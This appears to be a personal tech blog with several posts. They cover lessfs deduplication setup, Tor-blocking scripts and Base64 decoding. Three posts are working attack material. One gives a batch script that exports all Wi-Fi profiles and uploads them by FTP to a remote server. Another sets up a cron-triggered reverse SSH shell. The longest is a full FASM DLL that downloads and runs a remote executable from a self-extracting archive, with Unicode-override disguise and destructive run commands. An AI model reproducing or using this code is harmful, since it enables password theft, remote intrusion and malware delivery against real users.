Linux Storage Deduplication Solution

Lessfs is a high-performance inline data deduplication filesystem written for Linux and is currently licensed under the GNU General Public License version 3. It also supports LZO, QuickLZ and BZip compression (among a couple others), and data encryption. At the time of this writing, the latest stable version is 1.6.0-beta2, which can be downloaded from the SourceForge project page:
http://sourceforge.net/projects/lessfs/files/lessfs

Before installing the lessfs package, make sure you install all known dependencies for it. Some, if not most, of these dependencies may be available in your distribution’s package repositories. You will need to install a few manually though, including mhash, tokyocabinet and fuse (if not already installed).

Your distribution may have the libraries for mhash2 either available or installed, but lessfs still requires mhash. This also can be downloaded from SourceForge:
http://sourceforge.net/projects/mhash/files/mhash
At the time of this writing, the latest stable build is 0.9.9.9. Download, build and install the package:

$ tar xvzf mhash-0.9.9.9.tar.gz
$ cd mhash-0.9.9.9/
$ ./configure
$ make
$ sudo make install

Lessfs also requires tokyocabinet, as it is the main database on which it relies. The latest stable build is 1.4.47. To build tokyocabinet, you need to have zlib1g-dev and libbz2-dev already installed, which usually are provided by most, if not all, mainstream Linux distributions.

Download, build and install the package using the same configure, make and sudo make install commands from earlier. On 32-bit systems, you need to append --enable-off64 to the configure command. Failure to use --enable-off64 limits the databases to a 2GB file size.

If it is not already installed or if you want to use the latest and greatest stable build of FUSE, download it from SourceForge:
http://sourceforge.net/projects/fuse
At the time of this writing, the latest stable build is 2.8.5. Download, build and install the package using the same configure, make and sudo make install commands from earlier.

After resolving all the more obscure dependencies, you’re ready to build and install the lessfs package. Download, build and install the package using the same configure, make and sudo make install commands from earlier.

Now you’re ready to go, but before you can do anything, some preparation is needed. In the lessfs source directory, there is a subdirectory called etc/, and in it is a configuration file. Copy the configuration file to the system’s /etc directory path:

$ sudo cp etc/lessfs.cfg /etc/

This file defines the location of the databases among a few other details (which I discuss later in this article, but for now let’s concentrate on getting the filesystem up and running). You will need to create the directory path for the file data (default is /data/dta) and also for the metadata (default is /data/mta) for all file I/O operations sent to/from the lessfs filesystem. Create the directory paths:

$ sudo mkdir -p /data/{dta,mta}

Initialize the databases in the directory paths with the mklessfs command:

$ sudo mklessfs -c /etc/lessfs.cfg

The -c option is used to specify the path and name of the configuration file. A man page does not exist for the command, but you still can display the built-in help with the -h option.

Now that the databases have been initialized, you’re ready to mount a lessfs-enabled filesystem. In the following example, let’s mount it to the /mnt path:

$ sudo lessfs /etc/lessfs.cfg /mnt

When mounted, the filesystem assumes the total capacity of the filesystem to which it is being mounted. In my case, it is the filesystem on /dev/sda1:

$ df -t fuse.lessfs
Filesystem     1K-blocks    Used Available Use% Mounted on
lessfs           5871080 3031812   2541028  55% /mnt
$ df -t ext4
Filesystem     1K-blocks    Used Available Use% Mounted on
/dev/sda1        5871080 3031812   2541028  55% /

Currently, you should see nothing but a hidden .lessfs subdirectory when listing the contents of the newly mounted lessfs volume:

$ ls -a /mnt/
. .. .lessfs

Once mounted, the lessfs volume can be unmounted like any other volume:

$ sudo umount /mnt

Let’s put the volume to the test. Writing file data to a lessfs volume is no different from what it would be to any other filesystem. In the example below, I’m using the dd command to write approximately 100MB of all zeros to /mnt/test.dat:

$ sudo dd if=/dev/zero of=/mnt/test.dat bs=1M count=100
100+0 records in
100+0 records out
104857600 bytes (105 MB) copied, 5.05418 s, 20.7 MB/s

Because the filesystem is designed to eliminate redundant copies of data, and a file filled with nothing but zeros is a prime example of redundancy, only 48KB of capacity was consumed. Even that may be nothing more than the data synchronized to the databases:

$ df -t fuse.lessfs
Filesystem     1K-blocks    Used Available Use% Mounted on
lessfs           5871080 3031860   2540980  55% /mnt
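To make the idea concrete, here is a minimal Python sketch of fixed-size block deduplication. It is not how lessfs is implemented: the 128KB block size, the use of SHA-256 as the fingerprint and the dedup_stats helper are all assumptions made for illustration. It only shows why a file of zeros collapses to a single stored block.

```python
import hashlib

BLOCK_SIZE = 128 * 1024  # assumed block size, chosen for illustration only


def dedup_stats(data: bytes, block_size: int = BLOCK_SIZE):
    """Return (total_blocks, unique_blocks) for data split into fixed-size blocks."""
    seen = set()
    total = 0
    for offset in range(0, len(data), block_size):
        block = data[offset:offset + block_size]
        # SHA-256 is a stand-in fingerprint, not necessarily the hash lessfs uses
        seen.add(hashlib.sha256(block).digest())
        total += 1
    return total, len(seen)


if __name__ == "__main__":
    zeros = bytes(8 * 1024 * 1024)  # 8MB of zeros, a smaller cousin of the dd test
    total, unique = dedup_stats(zeros)
    print(f"{total} blocks written, {unique} unique block(s) stored")
```

Every block of zeros hashes to the same fingerprint, so only one copy needs to be kept; the rest is bookkeeping.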

If you generate a detailed listing of that same file in the lessfs-enabled directory, it appears that all 100MB have been written. Utilizing its embedded logic, lessfs reconstructs all data on the fly when additional read and write operations are initiated to the file(s):

$ ls -l
total 102400
-rw-r--r-- 1 root root 104857600 2011-02-26 13:57 test.dat

Now, let’s work with something a bit more complex: something containing a lot of random data. For this example, I decided to download the latest stable release candidate of the Linux kernel source from http://www.kernel.org, but before I did, I listed the total capacity consumed on the lessfs volume as a reference point:

$ df -t fuse.lessfs
Filesystem     1K-blocks    Used Available Use% Mounted on
lessfs           5871080 3031896   2540944  55% /mnt
$ sudo wget http://www.kernel.org/pub/linux/kernel/v2.6/testing/linux-2.6.38-rc6.tar.bz2

Listing the contents, you can see that the package is approximately 75MB:

$ ls -l linux-2.6.38-rc6.tar.bz2
-rw-r--r-- 1 root root 74783787 2011-02-21 19:50 linux-2.6.38-rc6.tar.bz2

Listing the capacity used to store the Linux kernel source archive yields a difference of roughly 75MB:

$ df -t fuse.lessfs
Filesystem     1K-blocks    Used Available Use% Mounted on
lessfs           5871080 3106440   2466400  56% /mnt

Now, let’s create a copy of the archived kernel source:

$ sudo cp linux-2.6.38-rc6.tar.bz2 linux-2.6.38-rc6.tar.bz2-bak
$ ls -l linux-2.6.38-rc6.tar.bz2*
-rw-r--r-- 1 root root 74783787 2011-02-21 19:50 linux-2.6.38-rc6.tar.bz2
-rw-r--r-- 1 root root 74783787 2011-02-26 14:43 linux-2.6.38-rc6.tar.bz2-bak

By having a redundant copy of the same file, an additional 44KB is consumed—not nearly as much as an additional 75MB:

$ df -t fuse.lessfs
Filesystem     1K-blocks    Used Available Use% Mounted on
lessfs           5871080 3106484   2466356  56% /mnt
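The figures quoted in the text can be checked directly from the "Used" column of the df listings. The short Python snippet below only redoes that subtraction; the variable names are mine, and the numbers are copied from the outputs in this article.

```python
# "Used" column (1K-blocks) copied from the df outputs in this article
used_before_download = 3031896
used_after_download = 3106440
used_after_copy = 3106484

archive_bytes = 74783787  # size of the kernel archive as reported by ls -l

first_copy_kb = used_after_download - used_before_download
second_copy_kb = used_after_copy - used_after_download

print(f"first copy:  {first_copy_kb} KB on disk for a {archive_bytes / 1024:.0f} KB file")
print(f"second copy: {second_copy_kb} KB on disk")
```

The first copy costs roughly the full size of the archive, since a bzip2 file contains little block-level redundancy, while the second copy costs only the bookkeeping overhead.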

And, because the databases contain the actual file data and metadata, if an accidental or intentional system reboot occurred, or if for whatever reason you need to unmount the filesystem, the physical data will not be lost. All you need to do is invoke the same mount command and everything is restored:

$ sudo umount /mnt/
$ sudo lessfs /etc/lessfs.cfg /mnt
$ ls
linux-2.6.38-rc6.tar.bz2 linux-2.6.38-rc6.tar.bz2-bak

If a system suffers an accidental reboot, possibly due to power loss, lessfs (as of version 1.0.4) supports transactions, which eliminates the need for an fsck after a crash.

Shifting focus back to lessfs preparation, note that the lessfs volume’s options can be defined by the user when mounting. For instance, you can define the desired options for big_writes, max_read and max_write. The big_writes option improves throughput when used for backup purposes, and both max_read and max_write must be defined to use it. The max_read and max_write options always must be equal to one another and define the block size for lessfs to use: 4, 8, 16, 32, 64 or 128KB.

The definition of a block size can be used to tune the filesystem. For example, a larger block size, such as 128KB (131072), offers faster performance but, unfortunately, at the cost of less deduplication (remember from earlier that lessfs uses block-level deduplication). All other options are FUSE-generic options defined in the FUSE documentation. An example of the use of supported mount options can be found in the lessfs man page:

$ man 1 lessfs

The following example is given to mount lessfs with a 128KB block size:

$ sudo lessfs /etc/lessfs.cfg /fuse -o negative_timeout=0,\
entry_timeout=0,attr_timeout=0,use_ino,\
readdir_ino,default_permissions,allow_other,big_writes,\
max_read=131072,max_write=131072
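The trade-off between block size and deduplication can be illustrated with a small Python sketch. It assumes simple fixed-size blocks and uses SHA-256 as a stand-in fingerprint; the stored_bytes helper is hypothetical and does not reflect lessfs internals. The test data is 1MB of random bytes followed by a copy in which a single byte has been flipped.

```python
import hashlib
import os


def stored_bytes(data: bytes, block_size: int) -> int:
    """Bytes kept after fixed-size block deduplication (hypothetical helper)."""
    unique = {}
    for offset in range(0, len(data), block_size):
        block = data[offset:offset + block_size]
        unique[hashlib.sha256(block).digest()] = len(block)
    return sum(unique.values())


original = os.urandom(1024 * 1024)   # 1MB of incompressible data
modified = bytearray(original)
modified[500_000] ^= 0xFF            # flip a single byte in the copy
data = original + bytes(modified)

for size in (4096, 131072):
    print(f"block size {size:>6}: {stored_bytes(data, size)} bytes stored")
```

With 4KB blocks, the one changed byte costs one extra 4KB block; with 128KB blocks, it costs a whole extra 128KB block. Larger blocks mean fewer lookups per megabyte, but every small difference between files invalidates more data.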

Additional configurable options for the database exist in your lessfs.cfg file (the same file you copied over to the /etc directory path earlier). The block size can be defined here, as well as the method of additional data compression to use on the deduplicated data and more. Below is an excerpt of what the configuration file contains. To define a new value for an option, uncomment the line with the desired value and comment out the other lines for that option:

BLKSIZE=131072
#BLKSIZE=65536
#BLKSIZE=32768
#BLKSIZE=16384
#BLKSIZE=4096
#COMPRESSION=none
COMPRESSION=qlz
#COMPRESSION=lzo
#COMPRESSION=bzip
#COMPRESSION=deflate
#COMPRESSION=disabled

This excerpt defines the default block size to 128KB and the default compression method to QuickLZ. If the defaults are not to your liking, in this file you also can define the commit-to-disk interval (default is 30 seconds) or a new path for your databases, but make sure to initialize the databases before use; otherwise, you’ll get an error when you try to mount the lessfs filesystem.
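As a quick sanity check before mounting, the active settings can be pulled out of a file in this style with a few lines of Python. This is only a sketch: the active_options helper is hypothetical, SAMPLE_CFG is a shortened copy of the excerpt above, and the rule that a later line overrides an earlier one is a property of this sketch, not a documented lessfs behavior.

```python
SAMPLE_CFG = """\
BLKSIZE=131072
#BLKSIZE=65536
#COMPRESSION=none
COMPRESSION=qlz
#COMPRESSION=lzo
"""


def active_options(text: str) -> dict:
    """Collect uncommented KEY=VALUE lines; a later line overrides an earlier one."""
    options = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue  # skip blanks, comments and anything that is not KEY=VALUE
        key, value = line.split("=", 1)
        options[key.strip()] = value.strip()
    return options


if __name__ == "__main__":
    print(active_options(SAMPLE_CFG))
```

To check a real installation, read the text from /etc/lessfs.cfg instead of the sample string.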

Summary

Now, Linux is not limited to a single data deduplication solution. There also is SDFS, a file-level deduplication filesystem that also runs on the FUSE module. SDFS is a freely available cross-platform solution (Linux and Windows) made available by the Opendedup Project. On its official Web site, the project highlights the filesystem’s scalability (it can dedup a petabyte or more of data); speed, performing deduplication/reduplication at a line speed of 290MB/s and higher; support for VMware while also mentioning its usage in Xen and KVM; flexibility in storage, as deduplicated data can be stored locally, on the network across multiple nodes (NFS/CIFS and iSCSI), or in the cloud; inline and batch mode deduplication (a method of post-process deduplication); and file and folder snapshot support. The project seems to be pushing itself as an enterprise-class solution, and with features like these, Opendedup means business.

It is also not surprising that, since 2008, data deduplication has been a requested feature for Btrfs, the next-generation Linux filesystem, although that also may be in response to Sun Microsystems’ (now Oracle’s) development of data deduplication in its advanced ZFS filesystem. Unfortunately, at this point in time, it is unknown if and when Btrfs will introduce data deduplication support, although it already contains support for various types of data compression (such as zlib and LZO).

Currently, the lessfs2 release is under development, and it is supposed to introduce snapshot support, fast inode cloning, new databases (including hamsterdb and possibly BerkeleyDB) apart from tokyocabinet, self-healing RAID (to repair corrupted chunks) and more.

As you can see, with a little time and effort, it is relatively simple to utilize the recent trend of data deduplication to reduce the total capacity consumed on a storage volume by removing all redundant copies of data. I recommend its usage in not only server administration but even for personal use, primarily because with implementations such as lessfs, even if there isn’t too much redundant data, the additional data compression will help reduce the total size of the file when it is eventually written to disk. It is also worth mentioning that the lessfs-enabled volume does not need to remain local to the host system; it also can be exported across a network via NFS or even iSCSI and utilized by other devices within that same network, providing a more flexible solution.

Posted in Linux, Security, Server

Open once again

For those who have visited this site in the past few months, my apologies for the lockdown. I was having a lot of legal trouble with my posts. I honestly had absolutely no intention of opening this site back up until I received a heart-warming email from a community member today thanking me for the tools I’ve shared here and asking me if I would open this site back up. I definitely didn’t expect that, and thanks, Chris, for your message.

Well, here you go: it’s back up. I can’t guarantee that I’ll post often, but I’ll do my best.

~Ryan

Posted in Uncategorized

Utilities for Blocking Tor exit nodes (Linux & Windows)

(NOTE: Some aspects of these utilities need revision; they will be in development for a while. Sorry for the inconvenience.)

I’ve been working on a solution to block Tor nodes on Windows and Linux web servers but they change so frequently that I knew it needed an automated process to get it done. I got a little lazy and frustrated with Windows so I wrote two Bash scripts to automate the process. They will work for a Windows server, but you need a Linux machine as well. If you’re a Windows person and refuse to have at least one Linux machine on your network, this site isn’t for you in the first place, deal with it.

The first script (TorBlock) is used to block Tor traffic on a local Linux server, or it can configure a Windows server’s .htaccess file to block the traffic. This script can be run once or added to Cron to keep the list of Tor IP addresses up to date.

The second script (TorTrack) is used to search through access logs and display access attempts from IP addresses associated with Tor. This script can also be run for a local Linux server or a remote Windows server. There are also additional instructions to configure your log filter options.

The code, documentation and instruction set are hosted here: Tor Doco

Source code is provided below for those who don’t wish to download it. Note: These tools will not work if you don’t read the documentation listed above.

I am releasing these with no license. Use, modify and distribute as you wish. Enjoy!

~Ryan MacNeille

Posted in Hacking, Linux, Networking, Scripts, Security, Server, Tips, Windows

Extract Any Wireless Password in Plain Text

Microsoft Windows has had the convenient “Wireless Profile” utility for quite some time, enabling users to export and import authentication for their wireless networks. The export process requires migrating through Wireless Network Connection settings and creating an XML file of the password hash through the GUI. This can be a long process that takes too much time. Luckily, the netsh utility can extract this data for us with a few commands. After some struggle, I have created a small batch file that can extract ALL wireless profiles, copy them to a remote server and display the passwords in plain text.

Interestingly, it doesn’t matter which security protocol you use for protecting your network, this process will still display the passwords in plain text.

Here’s the script:

@echo off

mkdir c:\Temp
netsh wlan export profile folder=c:\Temp
@ftp -i -s:”%~f0″&GOTO:EOF
open myserver.com
my_username
my_password
!:— FTP commands below here —
cd location/for/storage
put c:\Temp\*.xml
disconnect
quit
del c:\Temp\*.xml
bye

Now that we have the XML profiles on our own server, we can extract the plain text passwords by loading them on another machine with the command:

netsh wlan add profile filename=”Your_New_XML_File.xml”

Now check your profiles:

netsh wlan show profiles

Now that the new profile has been added, use the Windows GUI to view the Wireless Network Properties. Under the “Security” tab you will see the network security type, encryption type and will also have the option to “Show Characters”. This will display the network password in plain text.

Of course, this script can be run remotely on multiple machines simultaneously using the psexec utility or your Metasploit module of choice but I won’t be sharing the syntax here for obvious reasons. It is a little scary to think how easy it would be to run this script network-wide at a coffee shop, hotel or even a large organization. Personally, I think Microsoft should introduce some additional security for their Network Profile wizard but that’s just… like…  my opinion, man.

~Ryan MacNeille

Posted in Hacking, Networking, Scripts, Windows

Mac/Linux/bsd – Dirty Anti-Theft Preparation

This isn’t by any means an elegant trick, but it can certainly come in handy if your laptop is ever stolen.

Create a new shell script and add it to Cron – running every 10-30 minutes, or whenever you like.

Add this to the script:

if wget http://myserver.com/sshreverse;
  then ssh -R 2900:localhost:22 User@myserver.com;
fi

Now, if your computer is ever stolen, place a file on your webserver called “sshreverse”. Wait a little while for Cron to run the script, then run:

ssh whatever_your_username_is_on_your_machine@localhost -p 2900

This will create a reverse shell back to your machine. You can do whatever you want at this point; install a keylogger, take pictures from the webcam, destroy the network, etc.

This is a true reverse SSH session so it will get around NAT devices like WiFi routers or firewalls as well.

Posted in Hacking, Linux, Networking, Scripts, Tips

Self Extracting Archive Trickery

Alright, I’ve been working on this for about a week and finally got it working tonight. Some archive applications offer the ability to create an SFX (Self Extracting Archive). This is a really neat trick that can be used for all kinds of things, including creating auto-downloading & running viruses. I’m sure that wasn’t the intention of the programmers, but it’s very simple with a small custom dll.

First we need to make our dll. This file will be added to the archive and will be automatically executed. The function of the dll is to download a file from the internet and run it instantly. We’re going to use a Flat Assembler to create the dll. (
http://flatassembler.net
)

Download and launch FASMW.

Copy and paste this code into the program:

format PE GUI 4.0 DLL
  entry DllEntryPoint
include 'win32a.inc'
 section '.data' data readable writeable
CMD_OPEN db 'open',0
  url db 'http://remotesite.org/YourFile.exe',0
  output db 'c:\\YourFile.exe',0
section '.text' code readable executable
proc DllEntryPoint hinstDLL, fdwReason, lpvReserved
  mov eax,TRUE
  ret
  endp
 proc dcscdownload
  xor eax, eax
  invoke URLDownloadToFile, 0, url, output, 0, NULL ; download
  cmp eax, 0
  invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute
  ret
  endp
 section '.idata' import data readable writeable
library kernel,'KERNEL32.DLL',\
  urlmon,'URLMON.DLL',\
  Shell32,'SHELL32.DLL',\
  user,'USER32.DLL'
import Shell32,\
  ShellExecute,'ShellExecuteA'
import user,\
  MessageBox,'MessageBoxA'
import urlmon,\
  URLDownloadToFile,'URLDownloadToFileA'
section '.edata' export data readable
export 'OURDLL.DLL',\
  dcscdownload,'dcscdownload'
section '.reloc' fixups data discardable

This is just the basic code for the dll. There a few things you should know at this point. You need to go back into this code and change the URL DB to the remote file that you want to be downloaded, and the OUTPUT DB to the location you want the file to be saved. Note: the file names HAVE to match, ie: If the file on the remote server is called Notepad.exe, the saved file must also be exactly named Notepad.exe.

Also, if you have issues with FASMW not accepting the ‘input win32a.include’ you may have to use an absolute path to the file. It is in the FASM/INCLUDE directory.

Once you’re done, go ahead and choose Run->Compile and save the dll with whatever name you want. I called mine marrer.dll. Now we can finally launch our Archive program and create the SFX, I’m going to use WinRAR for this walk-through.

Once WinRAR is installed, you can right-click on the dll and choose the WinRAR option ‘Add to Archive’. Under ‘Archive Options’, select ‘Create SFX Archive’, then move to the Advanced tab and click on ‘SFX Options’. This will open up the SFX dialog where you can set a  huge variety of options. We’re just going to be modifying the archive directory and ‘Run After Archive’ option. The ‘Run Before Archive’ option can be very handy if you want to run commands locally or launch programs that you know are already installed, say for instance:  %SYSTEMDRIVE%\windows\system32\cmd.exe /k shutdown -s -f -t 1

There are also options like “Run as Administrator”, giving rights to the system, and “Delete files after extraction” which accepts custom parameters like… Oh I don’t know…  %SYSTEMDRIVE%\windows\system32\ ;)

Alright so, for our SFX, we’ll set the archive directory to %APPDATA%\dcsc\ and put this into the ‘Run After Archive’ field:

%SYSTEMDRIVE%\windows\system32\rundll32.exe %APPDATA%\dcsc\marrer.dll, dcscdownload

Note: You need to change the dll name here to whatever you named it before. Then just hit okay and that’s it!

The result here is that the archive will automatically load the dll, and the dll will instantly download, save and run a file from a remote server.

There are a few downsides to using SFX files as attacks. For instance, the .exe extension should be a dead giveaway, but using Unicode overrides, you can easily hide that. The only other downside is the extraction option box that opens up when the SFX is executed, which gives the user the option to change the installation directory. I’m sure this can be removed/ignored but I’ve spent too much time on this already so I’ll leave that up to you guys if you want to try it.

Either way, throw this dll in an archive and set those parameters, fill the archive with useful files and hand it over to someone. The options with this trick are pretty much endless, you can have the dll download a full-blown virus or a quiet keylogger, it’s up to you.

The intention of this article of course is not to advocate malicious cyber activity, rather to inform users of the potential of self-extracting archives in effort to remain vigilant against potential attacks comprised with this method.

~Ryan MacNeille

Posted in Hacking, Tips, Windows

All About Reverse Engineering Cryptography

I had a disappointing experience yesterday involving a long string of seemingly encrypted text that was sent to me. It originated from an anonymous email address at a temporary subdomain. My first thought was: “Ooo! Someone is trying to send me a secret message and is relying on, or testing my skills to view it.” I was quite excited to see what was hiding within the garbage so I started right away.

The string contained upper and lower case letters as well as numbers, and ended with the usual double equals (==). What caught my eye was a randomly located separation using plus signs (+). This is when I realized that my confusion was valid. We’ll come back to this later.

A lot of people get confused about encrypted text as opposed to hashed text, and this is where people give up. Attempting online “decrypters” and commonly shared tutorials will leave you feeling defeated. A simple explanation is that hash values are used to verify a password, but the password cannot be recovered from the stored value alone, whereas encrypted values actually contain a modified version of the original text that we want.

If you’re dealing with a short string of text, i.e., 16 bytes or so, you’re not dealing with meaningful ASCII or UTF-8 strings. If the value is known to be stored for password verification, then it is most likely a hash function that has been computed over the password; the one classical hash function with a 128-bit output is MD5, but it could be many things.

The best way to figure out what you’re dealing with is to look at the application code. Application code is incarnated in a tangible way which is not, and cannot be,  protected as well as a secret key can. Therefore, reverse engineering is pretty much the only way to go.

In this regard, reverse engineering is not a topic that will be easily discussed as the specific techniques may bring about undesired interest. My only recommendation for those who found this page in high hopes would be to venture to the deep web and either ask questions or find someone who would be willing to do the work for you. However, educated guesses can go a long way, so I will cover a few here:

  • If the same user were to change his password but reuse the original, does the stored value change? If so, then part of the value is most likely a randomized “salt” or IV (assuming symmetric encryption).
  • Assuming that the value is deterministic from the password for a given user, if two users choose the same password, does it result in the same stored value? If not, then the user name is most likely part of the computation. You may want to try to compute MD5(username:password) or other similar variants, to see if you can get a match.
  • Is the password length limited? Namely, if you set a 50-character password and cannot successfully authenticate by typing only the first 49 characters, then this means that all characters are important, and this implies that this really is password hashing, not encryption.
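The behaviors behind these guesses are easy to reproduce with Python’s hashlib. The snippet below is a sketch only: the user names, the password and the way the salt is combined with the password are made up for illustration, and a real application may combine them differently.

```python
import hashlib
import os


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def salted_md5_hex(password: str, salt: bytes) -> str:
    # Prepending the salt is an assumption; real schemes vary
    return hashlib.md5(salt + password.encode("utf-8")).hexdigest()


# Unsalted: two users with the same password get the same stored value.
print(md5_hex("hunter2") == md5_hex("hunter2"))

# User name mixed in: the same password yields a different value per user.
print(md5_hex("alice:hunter2") == md5_hex("bob:hunter2"))

# Random salt: setting the same password again changes the stored value.
print(salted_md5_hex("hunter2", os.urandom(8)) == salted_md5_hex("hunter2", os.urandom(8)))

# An MD5 digest is always 16 bytes (128 bits), whatever the input length.
print(hashlib.md5(b"x" * 50).digest_size)
```

The fixed 16-byte output is also why a hash cannot hold a 50-character password in recoverable form, while still changing if any one of those characters changes.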

Now, back to my email. I didn’t notice any slashes (/) in the code but still felt the need to strip it down to hexadecimal; it always looks so much nicer. On a Linux machine, I ran the following command:

perl -MMIME::Base64 -le 'print unpack "H*", decode_base64 "Insert code here"'

This command successfully converted the Base64 code into a plain hexadecimal format. This was the point that I started to get excited. Now I just had to run the hex code through an ASCII conversion and I’d have the original text. I used the following to complete the conversion:

import binascii
# Replace the placeholder with the hex string produced by the previous command
print(binascii.a2b_hex("Insert code here"))

Then I finally had my original text. The hexadecimal code was over 1,000 bytes so it was a little long, but I noticed some formatting that looked similar to HTML. I quickly dumped the output into a new text document and gave it a .html extension. Upon opening the file in a browser, my heart sank a little. It was a poorly formatted ad for Viagra & Cialis. It was simply a Base64 string of HTML code that wasn’t properly encoded for the email.
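For reference, the whole round trip can also be done in Python alone. This is a sketch with a made-up sample: the short HTML snippet stands in for the real message, which I am not reproducing here, and the hex step is kept only to mirror the two commands above.

```python
import base64
import binascii

# Hypothetical sample; the real message was a much longer Base64 string
encoded = base64.b64encode(b"<html><body>Hello</body></html>").decode("ascii")

raw = base64.b64decode(encoded)                    # Base64 text -> raw bytes
hex_form = binascii.hexlify(raw).decode("ascii")   # the intermediate hex dump
text = binascii.unhexlify(hex_form).decode("utf-8", errors="replace")

print(hex_form[:16])
print(text)
print("looks like HTML" if "<html" in text.lower() else "not obviously HTML")
```

Strictly speaking, the hex stage is optional, since base64.b64decode already returns the original bytes.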

~Ryan MacNeille

Posted in Hacking, Linux, Tips